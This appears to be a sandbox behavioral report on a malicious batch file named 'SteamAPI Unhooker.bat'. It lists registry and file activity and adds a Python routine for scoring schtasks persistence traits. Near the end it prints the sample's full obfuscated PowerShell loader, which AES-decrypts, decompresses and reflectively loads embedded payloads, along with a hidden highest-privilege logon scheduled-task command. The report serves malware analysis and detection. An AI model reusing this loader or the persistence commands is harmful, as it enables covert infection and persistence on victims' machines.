| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3504 set thread context of 2320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
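The SCHTASKS.exe line in the behavioral1 process list ("SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST) shows what this signature records: a logon-triggered task, run with highest privileges, whose action is a dropped executable in %TEMP%, under a name carrying the same $77 prefix as the $77stager registry value the loader reads. The function below is an added example, not from the report or the sample: it parses schtasks /create command lines and returns the traits a hunter would flag. The first sample is the report's command line; the other two are constructed here for contrast, and the switch parsing only covers the form seen in process-creation logs.

```python
"""Score schtasks.exe /create command lines for persistence traits."""
from __future__ import annotations

import re

# Constructed samples: the first is the command line recorded in the report,
# the other two are made up here (one benign, one suspicious).
SAMPLES = [
    r'''"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST''',
    r'''schtasks /create /tn "Backup Nightly" /tr "C:\Program Files\Acme\backup.exe" /sc daily /st 02:00''',
    r'''schtasks.exe /Create /F /TN "Updater" /TR "C:\Users\Admin\AppData\Roaming\upd.exe" /SC ONSTART /RL HIGHEST /RU SYSTEM''',
]

# A token is a double-quoted span or a run of non-blank characters.
TOKEN = re.compile(r'"[^"]*"|\S+')
# Directories any user can write to; a task action living there is a red flag.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
# Triggers that fire without user interaction and survive reboots.
PERSISTENT_TRIGGERS = {"onlogon", "onstart", "onidle", "minute"}


def parse_schtasks(cmd: str) -> dict[str, str]:
    """Map each /switch (lower-cased) to its value, '' for bare switches."""
    toks = [t.strip('"').strip("'") for t in TOKEN.findall(cmd)]
    opts: dict[str, str] = {}
    i = 1                                  # toks[0] is the executable
    while i < len(toks):
        if toks[i].startswith("/"):
            key = toks[i].lower()
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                opts[key] = toks[i + 1]    # switch with a value
                i += 2
                continue
            opts[key] = ""                 # bare switch such as /create or /F
        i += 1
    return opts


def assess(cmd: str) -> list[str]:
    """Persistence traits of one schtasks command line, in a fixed order."""
    o = parse_schtasks(cmd)
    if "/create" not in o:
        return []
    flags = []
    if o.get("/sc", "").lower() in PERSISTENT_TRIGGERS:
        flags.append("trigger:" + o["/sc"].lower())
    if o.get("/rl", "").lower() == "highest":
        flags.append("runlevel:highest")
    if o.get("/ru", "").lower() == "system":
        flags.append("runas:system")
    if USER_WRITABLE.search(o.get("/tr", "")):
        flags.append("action:user-writable-path")
    if o.get("/tn", "").startswith("$77"):
        flags.append("name:$77-prefix")
    return flags


if __name__ == "__main__":
    for line in SAMPLES:
        print(assess(line) or "clean", "<-", line)
```

The last check is specific to this sample; the other four are the general rule, and a task that trips two or more of them from a non-installer parent is worth pulling the task XML for.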
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = [binary value removed] | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C00DBE6209BC = [binary value removed] | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DBE6209BC" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={87747806-79BC-4BD0-BFF7-671EF04662E1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C00DBE6209BC" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_482_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_482.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WaaSMedicAgent.exe
